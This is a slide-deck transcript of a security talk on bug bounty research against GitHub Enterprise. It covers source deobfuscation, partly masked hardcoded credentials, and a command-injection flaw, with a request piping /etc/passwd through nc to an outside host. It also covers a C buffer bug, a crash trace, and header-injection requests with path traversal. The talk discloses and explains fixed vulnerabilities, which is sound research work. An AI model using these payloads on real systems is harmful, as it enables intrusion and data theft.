Offensive: Год в Github bugbounty, опыт участия. Эльдар kyprizel Заитов

1. GitHub Bug Bounty Experience
Eldar Zaitov

2. Whoami
• Information Security Engineer at Yandex
• LC↯BC / MSLC / Smoked Chicken CTF team
• CTFtime.org maintainer
2

3. What is Bug Bounty?
Companies pay money for finding security vulnerabilities in their services/software
• Google Vulnerability Reward Program (VRP)
• Facebook
• Yandex (“Охота за ошибками”)
• …
• https://hackerone.com/
3

4. Why GitHub?
• We use it
• Blackbox -> Whitebox (GitHub Enterprise)
• Fun
• Bounty
4

5. 01
› Available as Virtual Machine image at
https://enterprise.github.com/
› 45 days trial included
GitHub Enterprise

6. Virtual Machine Images
• Hyper-V
• OpenStack KVM ()
• VMWare ESXi
• XEN
6

7. VMware ESXi to Virtual Box (RAW)
7
vbox-img convert --srcfilename ghe-disk1.vmdk
--dstfilename ghe-disk1.raw
--srcformat VMDK
--dstformat RAW
Красный цвет
не правильный

8. 8

9. 9

10. haproxy
babeld
NGINX
elasticsearch
gpgverify
codeload
longpolld
github app
enterprise manage
slumlord
redis
mysqlRuby
C/C++
Golang
Java
alambic

11. 11
METHOD /path?querystring HTTP/1.1rn
Host: hostnamern
Connection: closern
rnrn
BODY
Method:
• GET
• POST
• PUT
• DELETE
• HEAD
• …

12. Haproxy
• HTTP
• HTTPS
• TCP
12

13. Babeld
• SSH (libssh)
• GIT (libgit)
• SVN
• HTTP (curl)
13

14. Slumlord
• Subversion (SVN) protocol emulator
acl ua_svn hdr_reg(User-Agent) -i ^SVN
• No internal auth:
HTTP_HUB_LOGIN
HTTP_HUB_PATH
14

15. NGINX
• Github Pages
• Main Unicorns + private mode
• Avatars
• Enterprise Manage
• Render
• Media
15

16. 02
Ruby apps

17. Blackbox -> Whitebox
17
require "ruby_concealer.so“
_ruby_concealer__
"xx9CrxCCMOx830x18x00xE0x17xC4x96x8Fx96x0Fx85mxCERx92xC5,Frx
17xB3xF81x0F"tx8EbexA1#x1Ex86']2x0F^<x18xBDxF8xDBxF5xF9x01xCF
rxA6xA8xB2x1FfGxC8%1xDEJ0XxC1xF4@xCC}bxAAxDFx06x8Ax92x13axB
8xF1xxD2xCELJxE9@x9CxC7xB1xCDxF6xBEK%
xEFx86x81Ux13v!qbxF3x15xD1xDDfPmxB2xD0xDC'wx01"x16vxACxFFcxB
Dx14xF0xF5xF1"xE6x90'2|xEEx11xF5<xE8xC0xCCexBCxDAUQx99x19x
03x15x81O.xADx16x87xE8pxB4xF8xF4NxABxFBx1Ex0Evx8BNxE5xD9x9Ah
xF6YxA9xA0txC6xDA[!4xE9ox85Mx7FxDESfxC0x9FxD4x04xFBxBBxC6x91S]
xD3x86}{x9BxF8xB5xCBbxD9]axC7x89xEAx97ixD2x92Qx1Ax8CuxC9x91
x83xA3xD7?txA5&xA9"
Красный цвет
не правильный

18. ruby_concealer.so
18

19. ruby_concealer.so
19

20. 20
#
# Seriously, CC @github/appsec and @github/dotcom-security
# if you need to touch this file
#
class ApplicationController
after_filter :set_html_safe
private
# Overrides default CSP with the preview policy if enabled for current_user
#
# Returns nothing.
def set_security_headers
if preview_features?
SecureHeaders.use_secure_headers_override(request, :preview_policy)
end
…

21. Main GitHub application
• 1.5M+ LOC
• Sinatra
• Secure randoms, MsgPack serializer
• Pretty clean code
21

22. Hardcoded credentials
22
auth = "apt:6YLkX******h0zXf"
github_package_host =
if hostname.end_with?(".iad.github.net")
"packages.iad.github.net"
else
"packages-ext.iad.github.net"
end
set_up_source
:id => "github",
:deb => "https://#{auth}@#{github_package_host}/github-precise precise main",
:key => "https://#{auth}@#{github_package_host}/pubkey.gpg?OCC30EA6"
end
Красный цвет
не правильный

23. Hardcoded credentials
23
uri = URI.parse("https://secure.braintreepaymentgateway.com/api/transact.php")
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_PEER
if Rails.production?
http.ca_file = "/usr/lib/ssl/certs/ca-certificates.crt"
end
params = {
"transactionid" => transaction_id,
"username" => "github",
"password" => "g********6",
…
Красный цвет
не правильный

24. Enterprise manage app
• 8k+ LOC
• The code is a mess
24

25. enterprise-manage/current/lib/manage/api.rb
25
get "/cluster-preflight" do
command = "sudo /usr/bin/env CLUSTER_ROLE=#{params[:type]}
/usr/local/share/enterprise/ghe-preflight-check“
if system(command)
status 200
else
status 400
`#{command}`
end
end
Красный цвет
не правильный

26. 26
GET /setup/api/cluster-
preflight?type=x%3Bcat+%2Fetc%2Fpasswd+%7C+nc+kyprizel.net+1114%3B HTTP/1.1
Host: 10.0.0.22:8443
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
Accept-Encoding: gzip, deflate, sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4

27. 27
get "/cluster-preflight“ do
role = params[:type]
cluster_roles = %w(git web job mysql elasticsearch redis memcache metrics pages
storage)
if cluster_roles.include?(role)
output = IO.popen(["sudo", "/usr/bin/env", "CLUSTER_ROLE=#{role}",
"/usr/local/share/enterprise/ghe-preflight-check"]) { |io| io.read }
if $?.exitstatus == 0
status 200
else
status 400
output
end
else
…

28. 03
› Binary
› Edge
Binary world

29. csgtools
29
Constructive Solid Geometry GEM
https://github.com/sshirokov/csgtool

30. 30

31. 31

32. src/util.c
32
assert_mem(line = calloc(strlen(read_buffer) + 1, sizeof(char)));
strncpy(line, read_buffer, strlen(read_buffer));
// See if we need to finish reading the line
while(line[strlen(line) - 1] != 'n') {
rc = fgets(read_buffer, sizeof(read_buffer), f);
if((rc == NULL) && feof(f)) {
// We got everything that we can get, so we'll
// call it a "line"
break;
}
…
Красный цвет
не правильный

33. src/util.c
33
assert_mem(line = calloc(strlen(read_buffer) + 1, sizeof(char)));
strncpy(line, read_buffer, strlen(read_buffer));
// See if we need to finish reading the line
while(strlen(line) && line[strlen(line) - 1] != 'n') {
rc = fgets(read_buffer, sizeof(read_buffer), f);
if((rc == NULL) && feof(f)) {
// We got everything that we can get, so we'll
// call it a "line"
break;
}
…
Красный цвет
не правильный

34. Babeld as SVN proxy
34
haproxy babeld
github app
slumlord
POST /auth
GET /repo

35. Babeld SVN auth
35
POST /auth/ HTTP/1.1
Host: local.github.test
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
username=xxx&password=xxx&domain=local.github.test

36. Babeld
36
GET /AAAAx512/BBBBx512/ HTTP/1.1
Host: local.github.test
Host: someother.host
Authorization: Basic …
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
Accept-Encoding: gzip
DAV: http://subversion.tigris.org/xmlns/dav/svn/depth
DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo
DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops
Connection: close

37. Babeld SVN auth
37
POST /auth/ HTTP/1.1
Host: local.github.test
Content-Type: multipart/form-data
Content-Length: 123
username=xxx&password=xxx&domain=someother.host

38. Babeld DoS
38
GET /AAAAx512/BBBBx512/ HTTP/1.1
Host: local.github.test
Host: someother.host
Authorization: Basic …
X-GITHUB-REQUEST-ID: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
Accept-Encoding: gzip
DAV: http://subversion.tigris.org/xmlns/dav/svn/depth
DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo
DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops
Connection: close

39. 39
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7fbdfb6a923e <_IO_vfprintf_internal+126>: mov QWORD PTR [rbp-0x450],rax
0x7fbdfb6a9245 <_IO_vfprintf_internal+133>: mov rax,QWORD PTR [r15+0x10]
0x7fbdfb6a9249 <_IO_vfprintf_internal+137>: mov QWORD PTR [rbp-0x448],rax
=> 0x7fbdfb6a9250 <_IO_vfprintf_internal+144>: call 0x7fbdfb6ef750 <strchrnul>
0x7fbdfb6a9255 <_IO_vfprintf_internal+149>: and r13d,0x8000
0x7fbdfb6a925c <_IO_vfprintf_internal+156>: mov QWORD PTR [rbp-0x4b8],rax
0x7fbdfb6a9263 <_IO_vfprintf_internal+163>: mov QWORD PTR [rbp-0x4a0],rax
0x7fbdfb6a926a <_IO_vfprintf_internal+170>: je 0x7fbdfb6a92f0
<_IO_vfprintf_internal+304>
Guessed arguments:
arg[0]: 0x44bc45 ("duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu
client_sent=%lu ")
arg[1]: 0x25 ('%')

40. 40
gdb-peda$ bt
#0 _IO_vfprintf_internal (s=s@entry=0x7fbdfc8224d0,
format=format@entry=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu
client_recv=%lu client_sent=%lu ", ap=ap@entry=0x7fbdfc822638)
at vfprintf.c:1315
#1 0x00007fbdfb6d5409 in _IO_vsnprintf (string=0x7fbdfc8228ef "", maxlen=<optimized
out>,
format=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu
client_sent=%lu ", args=args@entry=0x7fbdfc822638) at vsnprintf.c:119
#2 0x00007fbdfb6b3e22 in __snprintf (s=<optimized out>, maxlen=<optimized out>,
format=<optimized out>) at snprintf.c:33
#3 0x0000000000417314 in log_with_timestamp (fmt=0x44bc45 "duration_ms=%f
fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") at log.c:83
...

41. 41
...
#250 0x0000000000417b8f in log_with_timestamp (fmt=0x44bc45 "duration_ms=%f
fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ")
at log.c:212
#251 0x000000000041272b in http_generic_client_thread (ctx=0x44bc45,
handler=0x191) at http-server.c:303
#252 0x000000000041886b in http_svn_client_thread (arg=<optimized out>) at http-
server-svn.c:42
#253 0x00007fbdfba160a4 in start_thread (arg=0x7fbdfc8e1700) at pthread_create.c:309
#254 0x00007fbdfb74b5dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111

42. Babeld SVN auth
• Login
• User
• Push-URL
• Commit-URL
• Hub-Path
42

43. Babeld SVN proxy
43
GET /kyprizel/reponame/ HTTP/1.0
Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git
Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame
Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame
Hub-Login: kyprizel
Hub-User: kyprizel
Hub-Email: kyprizel@yandex.ru
Hub-Timezone: Europe/Moscow
Host: localtest.github
Authorization: Basic CREDENTIALS_HERE==
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285

44. 44

45. 45

46. 46

47. 47

48. Whitelisted headers
48
GET /kyprizel/reponame/ HTTP/1.0
Host: localtest.github
Authorization: Basic CREDENTIALS_HERE==
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
User-Agent: AAAAx980

49. 49
GET /kyprizel/reponame/ HTTP/1.0
Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git
Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame
Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame
Hub-Login: kyprizel
Hub-User: kyprizel
Hub-Email: kyprizel@yandex.ru
Hub-Timezone: Europe/Moscow
Host: localtest.github
Authorization: Basic CREDENTIALS_HERE==
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
User-Agent: AAAAx980

50. 50
GET /kyprizel/reponame/ HTTP/1.0
Host: localtest.github
Authorization: Basic CREDENTIALS_HERE==
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
User-Agent: AAAAx980
User-Agent: AAAAx980

51. 51
GET /kyprizel/reponame/ HTTP/1.0
Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git
Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame
Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame
Hub-Login: kyprizel
Hub-User: kyprizel
Hub-Email: kyprizel@yandex.ru
Hub-Timezone: Europe/Moscow
Host: localtest.github
Authorization: Basic CREDENTIALS_HERE==
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
User-Agent: AAAAx980
User-Agent: AAAAx980

52. 52
GET /kyprizel/reponame/ HTTP/1.0
Host: localtest.github
Authorization: Basic CREDENTIALS_HERE==
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
User-Agent: AAAAx980
User-Agent: AAAAx980
User-Agent: AAAAx980
…
rnrn
HUB-login: any-special-chars-here'"-
Hub-SVN-Map-Push-URL: ?/../../../../../targetuser/private
Hub-SVN-Commit-URL: ?/../../../../../targetuser/private
Hub-Path: ./../arbitary

53. 53
GET /kyprizel/reponame/ HTTP/1.0
Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git
Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame
Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame
Hub-Login: kyprizel
Hub-User: kyprizel
Hub-Email: kyprizel@yandex.ru
Hub-Timezone: Europe/Moscow
Host: localtest.github
Authorization: Basic CREDENTIALS_HERE==
User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
User-Agent: AAAAx980
User-Agent: AAAAx980
…

54. 54
User-Agent: AAAAx340
HUB-login: any-special-chars-here'"-
Hub-SVN-Map-Push-URL: ?/../../../../../targetuser/private
Hub-SVN-Commit-URL: ?/../../../../../targetuser/private
Hub-Path: ./../arbitrary
We control headers
rnrn
We also control request body

55. 55
::ffff:127.0.0.1 - kyprizel,special-chars-here'"-
[21/Jan/2017:00:04:44 +0000] - "GET /kyprizel/reponame/
HTTP/1.0" 500 5 0.0027
at=exception class=Rugged::OSError message="Failed to
resolve path
'/data/repositories/4/nw/45/c4/8c/9/9.git,./../arbitary': No such
file or directory“

56. kyprizel
Süraqtar?
Eldar Zaitov